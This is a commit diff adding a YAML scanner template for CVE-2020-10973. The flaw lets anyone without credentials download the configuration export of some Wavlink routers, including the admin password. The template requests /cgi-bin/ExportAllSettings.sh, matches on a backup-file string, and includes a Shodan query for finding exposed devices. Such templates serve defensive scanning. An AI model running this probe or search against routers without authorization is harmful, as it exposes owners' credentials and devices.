Create CVE-2020-10973.yaml
parent
689a07d542
commit
f4e7fc7817
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2020-10973
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wavlink WN530HG4 - Access Control
|
||||||
|
author: arafatansari
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
|
||||||
|
reference:
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10973
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.html:"WN551K1"
|
||||||
|
verified: "true"
|
||||||
|
tags: access,control,cve,2020
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'url=/backupsettings.dat'
|
Loading…
Reference in New Issue